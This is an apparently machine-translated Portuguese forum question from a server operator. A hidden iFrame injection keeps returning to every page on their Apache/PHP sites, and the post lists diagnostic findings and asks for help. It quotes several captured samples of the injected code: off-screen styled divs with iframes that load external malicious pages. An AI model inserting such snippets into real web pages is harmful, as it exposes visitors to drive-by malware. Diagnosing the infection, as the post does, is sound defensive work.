iFrame Injection Attack nos acompanhou ao novo servidor

Alguns meses atrás, um iFrame oculto começou a aparecer em todas as páginas de todos os sites em nosso servidor dedicado. Quando levamos os sites para manutenção com um 503, o iFrame ainda estava lá para baixo na página de manutenção. Eventualmente, o host bloqueou a fonte do iFrame, mas nunca encontramos o backdoor. O iFrame injetado era parecido com isso, mas envolvido em uma tag de estilo para ofuscar e com várias URLs:

iframe src = "http://heusnsy.nl/32283947.html ..

Mudamos nossos sites menores para um host diferente, e eles estão bem.

Nós movemos nosso site principal para um novo servidor dedicado no mesmo host, e apesar de nossos esforços para bloquear o servidor - firewalls, acesso restrito, atualizações de software, inspeção de todos os arquivos - o iFrame retornou.

Procuramos em todos os lugares para localizar como isso está ficando em arquivos de configuração, htaccess - mas não consegue encontrá-lo.

Alguma idéia de onde as vulnerabilidades da injeção do iFrame podem estar?

Edit: Aqui estão mais detalhes: máquina Linux rodando Apache e PHP. Versões mais recentes de tudo. O código que foi injetado se parece com isso:

<style>.ivx4di91j1 { position:absolute; left:-1418px; top:-1348px} </style> <div class="ivx4di91j1"><iframe src="heusnsy.nl/32283947.html..

Atualização: Aqui estão mais informações e o que aprendemos:

host: Estação CentOS Linux 6.3 - Linux 2.6.32-279.5.1.el6.x86_64 em x86_64 / Apache versão 2.2.15 - PHP 5.3.3 (construído): 3 Jul 2012 16:53:21)

O próprio servidor não é comprometido.

Todos os serviços, incluindo (apache / php), são atualizados para as versões mais recentes disponíveis para o nosso sistema.

Nenhuma conta (ftp ou de outra forma) foi comprometida.

O malware altera seu URL de destino (iframe src =) simultaneamente em vários sites infectados. (Cortesia de unmaskparasites.com)

Durante a mudança do alvo src, nenhum processo não autorizado ou oculto foi executado / executado.

O TCPDUMP obteve o código do malware enquanto deixa o 80 tcp da porta, mas nada foi encontrado na requisição GET do usuário que recebeu o malware - nada de estranho foi encontrado nos logs de acesso ao apache correspondentes.

Os arquivos do site ou o binário do httpd / php não foram alterados durante a troca do endereço src url do iFrame - cortesia da verificação md5sum.

Nenhuma conexão não autorizada foi feita nas portas conhecidas para os serviços conhecidos durante a alteração. Firewall cuida do resto.

rkhunter e maldet não tiveram resultados.

Malware iFrame é acionado e injetado logo após o primeiro"</script>" tag em qualquer página com essa tag, em todas as contas e sites deste servidor.

O malware é injetado em páginas estáticas e em sites sem conexões com o banco de dados. (é o suficiente para a página ter<head> </script></head> Tag)

Nenhum módulo de apache desonestos ou módulos php (excluindo mycript.so) foram instalados. A maioria dos módulos do apache padrão é suspensa e comentada.

O malware não está constantemente presente. Ele vem e vai, às vezes fica desligado por várias horas, e depois aparece para vários usuários e sai novamente. Tornando extremamente difícil rastrear.

100% dos códigos php e a maioria dos códigos javascript em nossos sites (exceto o phpmyadmin) são codificados de forma personalizada. A única coisa que não é são as bibliotecas do Jquery.

O servidor é uma máquina de alto tráfego e a pesquisa / correspondência nos logs é extremamente lenta. Log de acesso semanal pode se tornar mais de 15gb.

Essa é a situação ... Não é mais uma questão de contas comprometidas, arquivos hackeados, scripts maliciosos. Isso é algo além de qualquer coisa que vimos até agora e a causa está escondida em algum lugar do próprio apache / php. (Pelo menos é isso que pensamos). Qualquer ajuda ou idéias são muito apreciadas.

Aqui estão alguns exemplos da injeção do iFrame:

<script src="/templates/js/jquery-1.4.2.min.js" type="text/javascript"></script><style>.pw0xxs { position:absolute; left:-1795px; top:-1357px} </   style> <div class="pw0xxs"><iframe src="http://infectedsite.com/84064443.html" width="167" height="332"></iframe></div>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js" type="text/javascript"></script><style>.h3fuonj6 { position:absolute; left :-1012px; top:-1348px} </style> <div class="h3fuonj6"><iframe src="http://infectedsite.com/13334443.html" width="236" height="564"></iframe></div >

</script><style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://infectedsite.com/79144443.html" wid th="559" height="135"></iframe></div> document.write('<style>.exm31sfk8l { position:absolute; left:-1349px; top:-1836px} </style> <div class="exm31sfk8l"><iframe src="http://ksner.pl/79144443.ht ml" width="559" height="135"></iframe></div>');// ColorBox v1.3.19.3 - jQuery lightbox plugin

</script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px} </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443. html" width="163" height="409"></iframe></div>

<script src="./js/cross_framing_protection.js?ts=1344391602" type="text/javascript"></script><style>.rv9mlj { position:absolute; left:-1698px; top:-1799px}  </style> <div class="rv9mlj"><iframe src="http://infectedsite.com/42054443.html" width="163" height="409"></iframe></div>

questionAnswers(3)

yourAnswerToTheQuestion